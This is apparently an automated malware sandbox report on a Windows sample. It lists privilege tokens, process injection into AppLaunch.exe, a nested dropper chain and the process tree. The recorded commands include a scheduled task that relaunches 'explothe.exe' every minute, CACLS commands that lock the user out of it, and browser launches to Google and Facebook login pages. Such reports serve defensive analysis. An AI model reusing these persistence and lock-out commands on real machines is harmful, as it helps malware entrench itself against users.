Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\8675.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\source1.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\4257.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\444C.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3624 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3624 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3624 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3624 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3624 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3624 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3268 wrote to memory of 2868 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\62CC.exe
PID 3268 wrote to memory of 2868 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\62CC.exe
PID 3268 wrote to memory of 2868 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\62CC.exe
PID 3268 wrote to memory of 1876 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\6FCD.exe
PID 3268 wrote to memory of 1876 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\6FCD.exe
PID 3268 wrote to memory of 1876 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\6FCD.exe
PID 3268 wrote to memory of 5004 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\776F.bat
PID 3268 wrote to memory of 5004 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\776F.bat
PID 3268 wrote to memory of 5004 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\776F.bat
PID 3268 wrote to memory of 2044 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\7EF2.exe
PID 3268 wrote to memory of 2044 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\7EF2.exe
PID 3268 wrote to memory of 2044 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\7EF2.exe
PID 3268 wrote to memory of 4212 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8675.exe
PID 3268 wrote to memory of 4212 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8675.exe
PID 1876 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\6FCD.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1876 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\6FCD.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1876 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\6FCD.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1876 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\6FCD.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1876 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\6FCD.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1876 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\6FCD.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1876 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\6FCD.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1876 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\6FCD.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1876 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\6FCD.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1876 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\6FCD.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3268 wrote to memory of 3872 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8F40.exe
PID 3268 wrote to memory of 3872 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8F40.exe
PID 3268 wrote to memory of 3872 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8F40.exe
PID 2044 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\7EF2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2044 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\7EF2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2044 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\7EF2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2044 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\7EF2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2044 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\7EF2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2044 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\7EF2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2044 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\7EF2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2044 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\7EF2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2868 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\62CC.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uS3Ep0xD.exe
PID 2868 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\62CC.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uS3Ep0xD.exe
PID 2868 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\62CC.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uS3Ep0xD.exe
PID 2284 wrote to memory of 1884 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uS3Ep0xD.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IG0cq8AC.exe
PID 2284 wrote to memory of 1884 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uS3Ep0xD.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IG0cq8AC.exe
PID 2284 wrote to memory of 1884 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uS3Ep0xD.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IG0cq8AC.exe
PID 1884 wrote to memory of 5008 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IG0cq8AC.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\bL1tU9by.exe
PID 1884 wrote to memory of 5008 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IG0cq8AC.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\bL1tU9by.exe
PID 1884 wrote to memory of 5008 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IG0cq8AC.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\bL1tU9by.exe
PID 5008 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\bL1tU9by.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Qh9By1xf.exe
PID 5008 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\bL1tU9by.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Qh9By1xf.exe
PID 5008 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\bL1tU9by.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Qh9By1xf.exe
PID 2536 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Qh9By1xf.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1hU83ic7.exe
PID 2536 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Qh9By1xf.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1hU83ic7.exe
PID 2536 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Qh9By1xf.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1hU83ic7.exe
PID 5004 wrote to memory of 1912 N/A C:\Users\Admin\AppData\Local\Temp\776F.bat C:\Windows\system32\cmd.exe
PID 5004 wrote to memory of 1912 N/A C:\Users\Admin\AppData\Local\Temp\776F.bat C:\Windows\system32\cmd.exe
PID 3872 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\8F40.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 3872 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\8F40.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 3872 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\8F40.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 1696 wrote to memory of 436 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1hU83ic7.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1696 wrote to memory of 436 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1hU83ic7.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1696 wrote to memory of 436 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1hU83ic7.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe

"C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3624 -ip 3624

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3624 -s 160

C:\Users\Admin\AppData\Local\Temp\62CC.exe

C:\Users\Admin\AppData\Local\Temp\62CC.exe

C:\Users\Admin\AppData\Local\Temp\6FCD.exe

C:\Users\Admin\AppData\Local\Temp\6FCD.exe

C:\Users\Admin\AppData\Local\Temp\776F.bat

"C:\Users\Admin\AppData\Local\Temp\776F.bat"

C:\Users\Admin\AppData\Local\Temp\7EF2.exe

C:\Users\Admin\AppData\Local\Temp\7EF2.exe

C:\Users\Admin\AppData\Local\Temp\8675.exe

C:\Users\Admin\AppData\Local\Temp\8675.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\8F40.exe

C:\Users\Admin\AppData\Local\Temp\8F40.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2044 -ip 2044

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1876 -ip 1876

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1876 -s 396

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2044 -s 388

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uS3Ep0xD.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uS3Ep0xD.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IG0cq8AC.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IG0cq8AC.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\bL1tU9by.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\bL1tU9by.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Qh9By1xf.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Qh9By1xf.exe

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8DE3.tmp\8DE4.tmp\8DE5.bat C:\Users\Admin\AppData\Local\Temp\776F.bat"

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1hU83ic7.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1hU83ic7.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 1696 -ip 1696

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 436 -ip 436

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1696 -s 572

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 436 -s 540

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2ZD054Xl.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2ZD054Xl.exe

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffd0f2946f8,0x7ffd0f294708,0x7ffd0f294718

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd0f2946f8,0x7ffd0f294708,0x7ffd0f294718

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,1010164547647434954,8204489226398795367,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2388 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,1010164547647434954,8204489226398795367,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2188 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2104,1010164547647434954,8204489226398795367,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2972 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,1010164547647434954,8204489226398795367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,1010164547647434954,8204489226398795367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2060,70378628735622860,10700745688261214048,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

